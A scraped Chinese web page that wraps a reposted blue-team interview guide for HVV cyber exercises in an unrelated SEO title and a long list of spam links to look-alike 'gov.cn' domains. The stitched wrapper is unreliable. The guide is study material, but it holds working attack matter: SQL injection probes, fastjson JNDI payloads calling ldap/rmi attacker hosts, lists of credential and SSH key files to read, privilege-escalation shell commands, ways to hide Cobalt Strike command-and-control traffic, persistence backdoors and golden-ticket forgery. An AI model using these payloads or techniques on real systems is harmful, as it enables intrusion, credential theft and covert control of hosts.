当前位置: 首页 > news >正文

做外贸怎样上外国网站网站首页顶部图片尺寸

做外贸怎样上外国网站,网站首页顶部图片尺寸,上海网站建设内容更新,正规微商免费推广软件#x1f340;文章简介#xff1a;又到了一年一度的HW时刻#xff0c;本文写给新手想快速进阶HW蓝中的网安爱好者们#xff0c; 通读熟练掌握本文面试定个蓝中还是没问题的#xff01;大家也要灵活随机应变#xff0c;不要太刻板的回答#xff09; #x1f341;个人主页… 文章简介又到了一年一度的HW时刻本文写给新手想快速进阶HW蓝中的网安爱好者们 通读熟练掌握本文面试定个蓝中还是没问题的大家也要灵活随机应变不要太刻板的回答 个人主页杭椒 每日一词好久没更新了没更文的日子里依旧在好好学习哦 学习虽好但是不要忘记锻炼身体哦还有新手版的入门文章点击蓝色字体即可访问 动动小手点点赞和收藏555~面过的记得来评论报喜 护网一般分为红蓝两队做红蓝对抗。 红队为攻击队红队的构成主要有“国家队”国家的网安等专门从事网络安全的技术人员、厂商的渗透技术人员。其中“国家队”的占比大概是60%左右厂商的技术人员组成的攻击小队占比在40%左右。一般来说一个小队大概是3个人分别负责信息收集、渗透、打扫战场的工作。 蓝队为防守队一般是随机抽取一些单位参与。 另外设有裁判组 负责整个演习过程中的评判、评分工作。 网络安全人才是建设网络强国的最重要资源。网络安全的本质在对抗对抗的本质在攻防两端能力的较量。其实质是人与人的对抗“解决网络安全的关键不是硬件也不是软件而是人才”。加快培养网络安全人才是解决网络安全问题的关键所在。 加强网络安全防范意识网络安全关乎企业乃至国家安全整个社会都该高度重视积极响应提升安全防范意识为网络安全基础设施建设贡献出一份力量。 网络安全犹如国家的军队你可以不用但是你不能没有 HVV面试题研判分析 1Web TOP102SQL原理3SQL分类4SQL防御5SQL注入函数有哪些6SQL宽字节注入原理/条件7SQL注入如何判断数据库类型8SQL注入不存在回显9Mysql数据库站点无法链接10Mysql写shell有几种11Mysql无法写shell原因12SSRF原理13SSRF防御14SSRF利用15SSRF挖掘16CSRF与SSRF区别17XXE原理xml外部实体注入18XXE防御19JAVA反序列化20常见端口21设备误报如何处理22如何查看是扫描流量和手动流量23常用威胁情报平台24XSS25CSRF26XXE27SSRF28应急响应29溯源30反制31内网渗透32挖矿33内网34域控定位35Tomcat36log4j37Spring core RCE38Shiro39Weblogic40fastjson41Struts242Webshell43反弹shell不出网44CSCobalt Strike流量特征45CS上线隐藏46sqlmap流量特征47socks代理能不能去ping480day49常见的中间件漏洞50Linux 比较重要的目录51Windows日志事件ID52Windows和Linux的日志文件放在哪里53常见中间件配置文件路径54获得文件读取漏洞通常会读哪些文件Linux和windows都谈谈55如何分析被代理出来的数据流56Java框架57内网票据58权限维持59Windows常用的提权方法60Linux常用的提权方法 1Web TOP10 1. SQL注入 2. 失效的身份认证 3. 敏感数据泄露 4. XML外部实体XXE 5. 失效的访问控制 6. 安全配置错误 7. 跨站脚本XSS 8. 不安全的反序列化 9. 使用含有已知漏洞的组件 10. 不足的日志记录和监控2SQL原理 对用户输入的数据没有进行严格的过滤与判断 导致用户构造各种恶意payload拼接进后台数据库查询语句中执行。3SQL分类 常见联合查询布尔延时报错 其他宽字节堆叠等等4SQL防御 代码层面 1. 正则过滤 2. Php转义函数 3. 预编译pdo 4. 权限分明/权限限制 网络层面waf设备5SQL注入函数有哪些 逻辑运算符andor|| 联合查询Union select 查询字段 order by 报错注入floor() name_const()exp()convert()extractvalue() updatexml()6SQL宽字节注入原理/条件 目标站点对于特殊字符的转义单双引号前面会添加斜杠/斜杠/ url编码是 %5c 如果目标站点使用的是gbk编码则可以构造 payload %df 加 单引号%df与%5c进行结合成为一个汉字 而单引号则逃逸了出去7SQL注入如何判断数据库类型 1. 页面报错信息 2. 各个数据库特有的数据表 mssql数据库 and (select count(*) from sysobjects)0 and 11 access数据库 and (select count(*) from msysobjects)0 and 11 mysql数据库(mysql版本在5.0以上) and (select count(*) from information_schema.TABLES)0 and 11 oracle数据库 and (select count(*) from sys.user_tables)0 and 113.各数据库特有的连接符判断数据库类型 mssql数据库 and 1 1 11 mysql数据库 and 1 1 11 and CONCAT(1,1)11 oracle数据库and CONCAT(1,1)114.SQLserver数据库 延时注入 page.asp?id;WAITFOR DELAY 00:00:10; -- 默认变量 page.asp?idsql; SELECT SERVERNAME -- 触发错误有可能会报出DBMS类型 page.asp?id0/SERVERNAME 5.MySQL有一个内置的 BENCHMARK() 函数可以测试某些特定操作的执行速度 8SQL注入不存在回显 1.关闭了错误回显 2.没有回显位 3.延时 布尔注入 4.dnslog取回显9Mysql数据库站点无法链接 1. My.ini配置secure-file-priv为空或/ 则可以导出导入无限制 2. 绝对路径不正确 3. 权限不足/没有读写权限10Mysql写shell有几种 1.创建表导出 2.一句话导出 3.日志备份获取shell11Mysql无法写shell原因 1. My.ini配置secure-file-priv为空或/ 则可以导出导入无限制 2. 绝对路径不正确 3. 权限不足/没有读写权限12SSRF原理 服务器请求伪造服务端提供了从其他服务器应用获取数据的功能 且没有对目标地址做过滤与限制服务器就以服务器自己的身份去访问其他服务器的资源。13SSRF防御 1.过滤返回信息验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。 那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。 2. 统一错误信息避免用户可以根据错误信息来判断远端服务器的端口状态。 3.限制请求的端口为http常用的端口比如80,443,8080,8090。 4.黑名单内网ip。避免应用被用来获取获取内网数据攻击内网。 5.禁用不需要的协议。仅仅允许http和https请求可以防止类似于file:///,gopher://,ftp:// 等引起的问题。14SSRF利用 1.dict协议泄露安装软件版本信息查看端口操作内网redis服务等 2.file协议在有回显的情况下利用 file 协议可以读取任意内容 3.gophergopher支持发出GET、POST请求可以先截获get请求包和post请求包再构造成符合gopher协议 的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell 4.http/s协议探测内网主机存活15SSRF挖掘 1.分享通过URL地址分享网页内容 2.转码服务 3.在线翻译 4.图片加载与下载通过URL地址加载或下载图片 5.图片、文章收藏功能 6.未公开的api实现以及其他调用URL的功能 7.从URL关键字中寻找Share、wap、url、link、src、source、target、u、3g、display、sourceURL、 imageURL、domain16CSRF与SSRF区别 客户端/服务端的请求伪造17XXE原理xml外部实体注入 XML外部实体注入在应用程序解析XML输入时当允许引用外部实体时可构造恶意内容产生漏洞。服务端解析用户提交的XML文件时未对XML文件引用的外部实体含外部一般实体和外部参数实体做合适的 处理并且实体的URL支持 file:// 和 ftp:// 等协议导致可加载恶意外部文件和代码造成任意文件读 取、命令执行、内网端口扫描、攻击内网网站等危害 18XXE防御 使用开发语言提供的禁用外部实体的方法 过滤用户提交的XML数据 关键词!DOCTYPE和!ENTITY或者SYSTEM和PUBLIC。19JAVA反序列化 Java序列化是指把Java对象转换为字节序列的过程 Java反序列化是指把字节序列恢复为Java对象的过程 Java应用对用户输入即不可信数据做了反序列化处理那么攻击者可以通过构造恶意输入 让反序列化产生非预期的对象非预期的对象在产生过程中就有可能带来任意代码执行。 20常见端口 21 ftp22 ssh53 DNS80 http135/445 samba服务443 https1433 sqlserver 1521 Oracle,3306 mysql3389 rdp远程8080 Tomcat8888宝塔6379 redis50050 cs21设备误报如何处理 查看日志 如何防止记录正常业务服务的签名, 防止误报22如何查看是扫描流量和手动流量 扫描数据量大请求有规律手动扫描间隔较少23常用威胁情报平台 Viurstotal virustotal.com 微步威胁情报中心 x.threatbook.cn 360威胁情报中心 ti.360.cn 奇安信威胁情报中心 ti.qianxin.com 绿盟威胁情报中心 nti.nsfocus.com 安恒威胁情报中心 ti.dbappsecurity.com.cn VenusEye 威胁情报中心 venuseye.com.cn24XSS ​ 原理通过添加或修改页面JavaScript的恶意脚本在浏览器渲染页面的时候执行该脚本 从而实现窃取cookie或者调用Ajax实现其他类型的CSRF。25CSRF 挟持用户在当前已登录的Web应用程序上执行非本意的操作 防范验证HTTP Referer字段;在请求地址中添加token并验证26XXE 应用程序解析XML输入时没有禁止外部实体的加载导致可加载恶意外部文件防范禁止外部实体解析 通过黑名单过滤用户提交的XML数据xxe的检测----插入xml脚本代码27SSRF web应用都提供了从其他的服务器上获取数据的功能。使用指定的URLweb应用便可以获取图片下载文件读取文件内容等​ 采取白名单,限制内网Ip。对返回内容进行识别禁用一些不必要的协议统一错误信息避免用户可以根据错误信息来判断远端服务器的端口状态过滤函数file_get_contents fsockopen() curl_exec()28应急响应 查看日志详细信息、判断被攻击类型、找到被攻击点、处置、输出报告应急思路首先通过安全设备拦截攻击包体和日志分析了解攻击者具体进行了什么样的攻击 通过黑白结合模拟方法进一步判断攻击者的攻击方式。复现之后对漏洞进行修复对攻击者进行溯源。windows排查系统账户、端口进程、启动项、计划任务、查杀、日志分析4624成功、4625失败linux排查账户、历史命令、端口、启动项、日志lastlog最近登录、secure验证、btmp失败29溯源 查看日志详细信息分析攻击IP、查看IP的whois信息、信息收集溯源思路首先通过系统日志、安全设备截获攻击包等从中分析出攻击者的ip和攻击方式通过webshell或者 木马去微步分析或者去安恒威胁情报中心进行ip检测分析是不是云服务器基站等如果是云服务器的话 可以直接反渗透看看开放端口域名whois等进行判断获取姓名电话等丢社工库看看能不能找到更多信息 然后收工跳板机溯源 windowssecurity或者rdp日志的ip信息、网络连接、进程、浏览器记录、密码管理器、代理日志 linux进程、网络连接、日志、代理日志30反制 wifi反制近源渗透蜜罐wifi、弱密码、钓鱼页面、修改host跳转钓鱼页面CS4.0-4.4反制、MSF生成shellcode、dnslog/httplog、Goby 反制、蚁剑反制、AWVS、BURP、SQLMAP、 XSS钓鱼、蜜罐31内网渗透 提权、代理穿透、信息收集、纵横向、域控32挖矿 隔离主机、排查top资源占用、开机启动、任务计划、端口开放、清除33内网 内网横移IPC、WMI、SMB、msf密码喷射、PTPms14-068内网报警定位报警打补丁木马查杀分析流量微补查询 whois社工34域控定位 ipconfig /all systeminfo、net config workstation35Tomcat 实现内存马加载注册filter漏洞任意文件上传文件包含未授权弱口令war后门上传36log4j 日志中包含 ${},lookup功能就会将表达式的内容替换为表达式解析后的内容而不是表达式本身。37Spring core RCE 利用class对象构造利⽤链对Tomcat的日志配置进行修改然后向⽇志中写⼊shell38Shiro 关键字rememberMedeleteMe​ 利用出网反弹、不出网写shell​ 原理用户登陆成功后会生成经过加密并编码的cookie在服务端接收cookie值后Base64解码–AES解密– 反序列化。攻击者只要找到AES加密的密钥就可以构造一个恶意对象对其进行序列化–AES加密– Base64编码然后将其作为cookie的rememberMe字段发送Shiro将rememberMe进行解密并且反序列化 最终造成反序列化漏洞​ 550Apache Shiro框架提供了记住密码的功能RememberMe用户登录成功后会生成经过加密并编码的 cookie。在服务端对rememberMe的cookie值先base64解码然后AES解密再反序列化就导致了 反序列化RCE漏洞。在 Apache Shiro1.2.4 版本中 AES 加密时采用的 key 是硬编码在代码中​ 721由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题用户可通过 Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段并重新请求网站进行反序列化攻击 最终导致任意代码执行。相较于550而言它不需要知道key的值但是它需要一个合法用户的rememberMe cookie​ 出网协议jndi、ldap、rmi、JRMP、JMX、JMS39Weblogic T3原理利用RMI远程方法调用 机制的缺陷通过 JRMP 协议Java远程方法协议达到执行任意反序列化 代码进而造成远程代码执行。CVE-2014-4210SSRF、SearchPublicRegistries.jsp页面使用远程服务器CVE-2017-10271WLS Security组件对外提供webservice服务其中使用了XMLDecoder来解析用户传入的 XML数据在解析的过程中出现反序列化漏洞CVE-2018-2894未授权的两个页面存在任意上传getshell漏洞可直接获取权限。 /ws_utc/begin.do/ws_utc/config.doCVE-2019-2618弱口令文件上传CVE-2018-2628利用其他rmi绕过weblogic黑名单限制然后在将加载的内容利用readObject解析从而造成 反序列化CVE-2020-14882构造特殊的HTTP请求在未经身份验证的情况下接管 WebLogic Server Console并在WebLogic Server Console 执行任意代码。CVE-2020-14883未授权访问得到管理员界面CVE-2020-2551类似于RMI反序列化漏洞CVE-2017-3241都是由于调用远程对象的实现存在缺陷导致序列化对象任意构造组合拳1488214883组合拳14882做一个未授权访问登到控制台然后通过14883命令执行写一个xml文件把命令写进去让它去访问你的vps然后加载xml。40fastjson 原理攻击者可以传入一个恶意构造的JSON内容程序对其进行反序列化后得到恶意类并执行了恶意类中的恶意 函数进而导致代码执行。1.2.24fastjson autotype在处理json对象的时候未对type字段进行完全的安全性验证1.2.47绕过白名单1.2.41增加了checkAutoType()函数黑白名单访问在原类名头部加L尾部加;即可绕过黑名单的同时加载类。1.2.42类名外部嵌套两层L和;1.2.45{type:org.apache.ibatis.datasource.jndi.JndiDataSourceFactory,properties:{data_source:ldap://localhost:1389/Exploit}}1.2.47loadClass中默认cache为true利用分2步首先使用java.lang.Class把获取到的类缓存到mapping中然后直接从缓存中获取到了com.sun.rowset.jdbcRowSetlmpl这个类绕过了黑名单机制。1.2.62{type:org.apache.xbean.propertyeditor.JndiConverter,AsText:rmi://x.x.x.x:9999/exploit};1.2.66{type:org.apache.shiro.jndi.JndiObjectFactory,resourceName:ldap://192.168.80.1:1389/Calc}41Struts2 原理在处理action的时候调用底层的getter/setter来处理http的参数将每一个http的参数声明为一个 ONGL通过构造恶意代码被ONGL处理后只要有权限就可以执行任何DOS命令判断请求以action结尾029OGNL表达式来访问ActionContext中的对象数据032启用动态方法调用045基于Jakarta插件的文件上传功能时有可能存在远程命令执行046设置Content-Disposition的filename字段或者设置Content-Length超过2G048漏洞成因是当ActionMessage接收客户可控的参数数据时由于后续数据拼接传递后处理不当导致任意代码执行052使用XStream组件对XML格式的数据包进行反序列化操作时未对数据内容进行有效验证可被远程攻击。053Freemarker解析一次之后变成离开一个表达式被OGNL解析第二次059标签属性二次解析062针对059绕过加强OGNL表达式沙盒devModedevMode模式开启42Webshell 流量特征蚁剑可以对流量进行加密、混淆。但是有些关键代码没有被加密php ini_set、set_time_limitasp OnError ResumeNextresponse蚁剑混淆加密后还有一个比较明显的特征即为参数名大多以“_0x…”这种形式每个请求体都存在ini_set(“display_errors”, “0”);set_time_limit(0)开头。并且存在base64等字符响应包的结果返回格式为 随机数 结果 随机数冰蝎content-type AcceptCache-Control 内置16个ua头 content-length请求长度 菜刀2014 伪造UA头函数分割 base加密哥斯拉php 请求都含有pass第一个包jsp 含有pass而且发起连接时服务器返回的Content-Length是0内存马如何排查​ 1、如果是jsp注入日志中排查可以jsp的访问请求。​ 2、如果是代码执行漏洞排查中间件的error.log,查看是否有可疑的报错判断注入时间和方法。​ 3、根据业务使用的组件排查可能存在的java代码执行漏洞spring的controller了类型的话根据上报webshell的url查找日志filter或者listener类型可能会有较多的404但是带有参数的请求。43反弹shell不出网 ​ nc反弹、psexec、Neo-reGeorg代理、ICMP、dns、http协议隧道44CSCobalt Strike流量特征 默认端口 50050store证书特征 Alias name、Owner、Issuer字段 默认密码1234560.0.0.0是Cobalt Strike DNS Beacon特征45CS上线隐藏 代理转发上线DNS上线CDN上线域前置上线云函数上线​ 1、 DNS上线​ 一般我们拿到的shell都是对出网有限制的一般只能DNS出网这时候就要用到我们 DNS 协议建立 C2 通信。一般waf不会分析DNS流量这一点也是能够隐蔽的特性。​ DNS_TXT隧道传输控制端发送的对目标的操作命令被加密后通过DNS的TXT记录里通过DNS隧道传输隐蔽性较强不易被发现但传输速度非常慢。​ 2、 CDN上线​ CDN的IP是多个域名共用的为了做到精确判断CDN会解析我们的host头根据这样的方式进行判断通信域名这样我们设置上线IP设置为CDN服务器的IPhost设置为我们的DNS达到隐藏IP的需求​ 3、 云函数上线​ 云函数还是得益于Serverless架构或者称为无服务器架构是最近几年新冒出来的一种架构风格仅需用户编写和上传核心业务代码交由平台完成部署、调度、流量分发、弹性伸缩等能力。​ 我们就可以利用云函数配置个流量转发C2Client访问云函数云函数将流量转发到咱们的C2服务器一般云函数服务器都会配置CDN这样速度还行还可以达对C2服务器的隐藏。46sqlmap流量特征 sqlmap的关键字特征user-agent、 xss测试语句、随机数的位数 sqlmap的攻击流程具有一定的顺序和规律 sqlmap的一些payload测试语句具有模板特征47socks代理能不能去ping 不能介于传输层和会话层之间用tcp传输数据不支持icmp不能用ping命令480day 确定存在真实攻击行为在客户允许的情况下可以采取断网隔离措施不行就采取白名单连接防火墙策略看告警、确定资产poc复现、确认是否攻击成功49常见的中间件漏洞 IISPUT、短文件名猜解、远程代码执行、解析漏洞 Apache解析漏洞、目录遍历 nginx文件解析、目录遍历、CRLF注入、目录穿越 tomcat远程代码执行、war后门部署 jboss反序列化、任意文件上传、war后门50Linux 比较重要的目录 首先是日志/var/log里面的message保存了比较重要的信息一般出问题了登上去首先会去看这里。 还有lastb查看登录错误的日志last查看所有的登录日志lastlog查看最后一次登录的日志 还有/var/log/secure记录了验证和授权方面的信息只要涉及账号和密码的程序都会记录 比如SSH登录su切换用户sudo授权。home目录下面有个.bash_history如果etc/passwd发现有新增的可疑用户的话会去看一下他记录了历史命令。 var/spool/cron里面有计划任务留后门的话有可能会定时反弹shell。 home/用户名/ssh 记录了ssh公钥查看有没有被留后门。 etc/rc.local开机自启动。 面试官临时文件在哪个目录 var/tmp51Windows日志事件ID 事件ID 说明 4624 登陆成功 4625 登陆失败 4634 注销成功 4647 用户启动的注销 4672 使用管理员登陆 4720 创建用户52Windows和Linux的日志文件放在哪里 Windows 主要有以下三类日志记录系统事件应用程序日志、系统日志和安全日志 系统日志%SystemRoot%\System32\Winevt\Logs\System.evtx 应用程序日志%SystemRoot%\System32\Winevt\Logs\Application.evtx 安全日志%SystemRoot%\System32\Winevt\Logs\Security.evtxLinux 日志默认存放位置/var/log/ 查看日志配置情况more /etc/rsyslog.conf53常见中间件配置文件路径 apache/etc/httpd/conf nginx/etc/nginx iis7C:\Windows\System32\inetsrv\config\54获得文件读取漏洞通常会读哪些文件Linux和windows都谈谈 通用找 Web 应用的配置文件指不定有外联数据库 找 Web 中间件的配置文件指不定有 Tomcat 配置界面的用户密码 找系统文件linux etc/passwd、etc/shadow直接读密码 /etc/hosts # 主机信息 /root/.bashrc # 环境变量 /root/.bash_history # 还有root外的其他用户 /root/.viminfo # vim 信息 /root/.ssh/id_rsa # 拿私钥直接ssh /proc/xxxx/cmdline # 进程状态枚举 xxxx 可以为0000-9999 使用burpsuite 数据库 config 文件 web 日志 access.log, error.log ssh 日志 bash /root/.ssh/id_rsa /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys /etc/ssh/sshd_config /var/log/secure /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/syscomfig/network-scripts/ifcfg-eth1 /var/lib/php/sess_PHPSESSID # 非常规问题 session 文件( 参考平安科技的一道session包含 http://www.jianshu.com/p/2c24ea34566b)windows C:\boot.ini //查看系统版本 C:\Windows\System32\inetsrv\MetaBase.xml //IIS 配置文件 C:\Windows\repair\sam //存储系统初次安装的密码 C:\Program Files\mysql\my.ini //Mysql 配置 C:\Program Files\mysql\data\mysql\user.MY D //Mysql root C:\Windows\php.ini //php 配置信息55如何分析被代理出来的数据流 分析数据包请求头中的 xff、referer 等收集有用的信息运维审计和管理平台堡垒机 DAS数据库安全审计平台 LAS日志审计安全平台 AC上网行为管理系统 伪装欺骗系统蜜罐、蜜网 SIP安全态势感知平台 IPS入侵防御系统 AV反病毒系统 EDR主机安全管理\终端检测和响应 IDS入侵检测 NGAF/NGFW防火墙56Java框架 Apache Shiro、Spring Security、Struts2、Fastjson、jackson、rmi、weblogic、jboss57内网票据 黄金票据是指通过伪造TGT来进行下一步的Kerberos认证从而获取到访问服务器的ST。实际上只要拿到了域控权限就可以直接导出krbtgt的Hash值再通过mimikatz即可生成任意用户任何权限的Ticket。​ 原理AS应答Client时会返回TGT、使用KDC生成的Client密钥加密KDC生成的Client/TGS SessionKey​ 制作条件域名称、域SID、域KRBTGT账户密码HASH、伪装的用户名防御限制域管理员登录到除域控制器和少数管理服务器以外的任何其他计算机不要让其他管理员登录到这些服务器将所有其他权限委派给自定义管理员组。白银票据是通过伪造ST获得权限但因为所访问的对象在TGT中通过SID指定了所以通过白银票据只能访问特定的服务。​ 原理在TGS应答Client会发送ST、使用Client/TGS SessionKey加密的Client/Server SessionKey。只要我们获得了对应Server的Hash则可以伪造出自己的ST从而访问特定服务之所以是特定是因为pac只能KDC制作和查看,我们无法伪造pac所以只能访问不验证pac的服务如cifs。​ 制作条件域名称、SID、目标主机、服务名称、目标主机hash值、任意用户名、ptt内存导入​ 特点白银票据不经过域控、只能访问不验证pac的服务增强版黄金票据普通黄金票据不能跨域只能在当前域使用不能跨域包括子域对父域的跨域。​ 制作通过域内主机在迁移时LDAP库中的SIDHistory属性中保存的上一个域的SID值制作可以跨域的金票。如果知道根域的SID那么就可以通过子域的KRBTGT的HASH值使用mimikatz创建具有 EnterpriseAdmins组权限域林中的最高权限的票据。58权限维持 Linuxcrontab定时任务、ssh后门进程注入hook密码校验函数得到管理员密码、修改管理员二进制文件 创建链接使管理员在输入ls或者cd等这种命令的时候执行恶意脚本、pam后门、开机启动脚本windows隐藏用户、计划任务、开机自启、服务后门、黄金白银票据、DLL劫持59Windows常用的提权方法 土豆全家桶、systeminfo提权辅助页面、注册表提权系统漏洞提权sc 命令提权administrator–system不带引号的服务路径不安全的服务权限提升绕过系统 UAC 提升60Linux常用的提权方法 脏牛、suid、find命令、rbashgit提权sudoer提权1.uid提权 (find / -perm -us -type f 2/dev/null) 2.sudo git help config !/bin/bash或者sh完成提权 3、脏牛提权 4、内核提权 5、环境劫持 6、suid提权 7、cve-2021-4034 8、docker提权
文章转载自:
http://www.morning.wpydf.cn.gov.cn.wpydf.cn
http://www.morning.hhxkl.cn.gov.cn.hhxkl.cn
http://www.morning.lmhh.cn.gov.cn.lmhh.cn
http://www.morning.qgtbx.cn.gov.cn.qgtbx.cn
http://www.morning.jpmcb.cn.gov.cn.jpmcb.cn
http://www.morning.nqcwz.cn.gov.cn.nqcwz.cn
http://www.morning.yaqi6.com.gov.cn.yaqi6.com
http://www.morning.lkkkf.cn.gov.cn.lkkkf.cn
http://www.morning.wknj.cn.gov.cn.wknj.cn
http://www.morning.lqqqh.cn.gov.cn.lqqqh.cn
http://www.morning.fcpjq.cn.gov.cn.fcpjq.cn
http://www.morning.dzrcj.cn.gov.cn.dzrcj.cn
http://www.morning.zrrgx.cn.gov.cn.zrrgx.cn
http://www.morning.qsctt.cn.gov.cn.qsctt.cn
http://www.morning.rknhd.cn.gov.cn.rknhd.cn
http://www.morning.tgqzp.cn.gov.cn.tgqzp.cn
http://www.morning.wkmpx.cn.gov.cn.wkmpx.cn
http://www.morning.hxpff.cn.gov.cn.hxpff.cn
http://www.morning.sqhlx.cn.gov.cn.sqhlx.cn
http://www.morning.lmrjn.cn.gov.cn.lmrjn.cn
http://www.morning.tmbtm.cn.gov.cn.tmbtm.cn
http://www.morning.bszmy.cn.gov.cn.bszmy.cn
http://www.morning.cnqdn.cn.gov.cn.cnqdn.cn
http://www.morning.ckhyj.cn.gov.cn.ckhyj.cn
http://www.morning.gpsrk.cn.gov.cn.gpsrk.cn
http://www.morning.jwefry.cn.gov.cn.jwefry.cn
http://www.morning.cbnxq.cn.gov.cn.cbnxq.cn
http://www.morning.twwzk.cn.gov.cn.twwzk.cn
http://www.morning.hmpxn.cn.gov.cn.hmpxn.cn
http://www.morning.mxcgf.cn.gov.cn.mxcgf.cn
http://www.morning.wdqhg.cn.gov.cn.wdqhg.cn
http://www.morning.mtcnl.cn.gov.cn.mtcnl.cn
http://www.morning.bmbnc.cn.gov.cn.bmbnc.cn
http://www.morning.51meihou.cn.gov.cn.51meihou.cn
http://www.morning.dztp.cn.gov.cn.dztp.cn
http://www.morning.rkxk.cn.gov.cn.rkxk.cn
http://www.morning.ylyzk.cn.gov.cn.ylyzk.cn
http://www.morning.yzmzp.cn.gov.cn.yzmzp.cn
http://www.morning.wsyq.cn.gov.cn.wsyq.cn
http://www.morning.dwtdn.cn.gov.cn.dwtdn.cn
http://www.morning.qkqjz.cn.gov.cn.qkqjz.cn
http://www.morning.bwnd.cn.gov.cn.bwnd.cn
http://www.morning.bpmfz.cn.gov.cn.bpmfz.cn
http://www.morning.rlhh.cn.gov.cn.rlhh.cn
http://www.morning.xxsrm.cn.gov.cn.xxsrm.cn
http://www.morning.frtb.cn.gov.cn.frtb.cn
http://www.morning.srkwf.cn.gov.cn.srkwf.cn
http://www.morning.xrwbc.cn.gov.cn.xrwbc.cn
http://www.morning.jhyfb.cn.gov.cn.jhyfb.cn
http://www.morning.sqxr.cn.gov.cn.sqxr.cn
http://www.morning.jnrry.cn.gov.cn.jnrry.cn
http://www.morning.sgbss.cn.gov.cn.sgbss.cn
http://www.morning.mkzdp.cn.gov.cn.mkzdp.cn
http://www.morning.qhczg.cn.gov.cn.qhczg.cn
http://www.morning.nfpct.cn.gov.cn.nfpct.cn
http://www.morning.tfwr.cn.gov.cn.tfwr.cn
http://www.morning.nlpbh.cn.gov.cn.nlpbh.cn
http://www.morning.lmhcy.cn.gov.cn.lmhcy.cn
http://www.morning.zdmrf.cn.gov.cn.zdmrf.cn
http://www.morning.nrlsg.cn.gov.cn.nrlsg.cn
http://www.morning.fqcdh.cn.gov.cn.fqcdh.cn
http://www.morning.nshhf.cn.gov.cn.nshhf.cn
http://www.morning.wdqhg.cn.gov.cn.wdqhg.cn
http://www.morning.jcrfm.cn.gov.cn.jcrfm.cn
http://www.morning.ktmbp.cn.gov.cn.ktmbp.cn
http://www.morning.qpmmg.cn.gov.cn.qpmmg.cn
http://www.morning.nptls.cn.gov.cn.nptls.cn
http://www.morning.tpssx.cn.gov.cn.tpssx.cn
http://www.morning.crqpl.cn.gov.cn.crqpl.cn
http://www.morning.zdsdn.cn.gov.cn.zdsdn.cn
http://www.morning.rdng.cn.gov.cn.rdng.cn
http://www.morning.kngx.cn.gov.cn.kngx.cn
http://www.morning.qlpyn.cn.gov.cn.qlpyn.cn
http://www.morning.zwhtr.cn.gov.cn.zwhtr.cn
http://www.morning.bkfdf.cn.gov.cn.bkfdf.cn
http://www.morning.rkqqf.cn.gov.cn.rkqqf.cn
http://www.morning.yppln.cn.gov.cn.yppln.cn
http://www.morning.qyglt.cn.gov.cn.qyglt.cn
http://www.morning.nzlqt.cn.gov.cn.nzlqt.cn
http://www.morning.rbylq.cn.gov.cn.rbylq.cn
http://www.tj-hxxt.cn/news/240053.html

相关文章:

  • 做网站的费用如何入账wordpress 极简 h5
  • 中国建设网建设通官方网站免费的行情网站app代码
  • 搜狐最大的门户网站律师网络推广哪个比较好
  • 如何进行营销型企业网站的优化长沙网站建设招聘
  • 可以做初中地理题的网站wordpress 文章路径
  • 免费微信微网站模板下载做网站学哪些语言
  • 徐州微网站开发公司百度网站建设公司
  • 网站的建设流程具体有哪些更先进的seo服务
  • 网站seo优化方案设计手机搭建网站教程
  • 互联网定制网站关键词排名推广
  • asp网站管理系统广告设计和平面设计有什么区别
  • 外星人建设的网站专业微信网站建设公司首选公司哪家好
  • 山东网站营销护理专业简历
  • 杭州模板网站制作wordpress搬家后页面空白
  • 个人网站备案 资料胶州哪家公司做网站
  • 如何自己创建网站教程网站制作(信科网络)
  • 没备案的网站南通网站建设规划书
  • 网站建设方案的征求意见上海公司法人变更
  • 网站系统建设的目标联享品牌网站建设
  • 企业网站建设兴田德润电话中国建设工程交易网
  • 课程网站建设规划方案怎么上百度推广产品
  • 网站域名有了 网站如何建设wordpress jp
  • 达州做网站wordpress 搬家 问题
  • 梅州市网站制作郑州外贸网站建设
  • wordpress音乐站主题网站淘客怎么做
  • 网站不在首页显示出来吗公司的网站怎么运营
  • 简述网站建设基本步骤游戏推广代理
  • wordpress内页长尾词排名seo美式
  • 苏州网站地址怎么做业务推广技巧
  • 求个网站好人有好报2022温室大棚建设 网站及排名转卖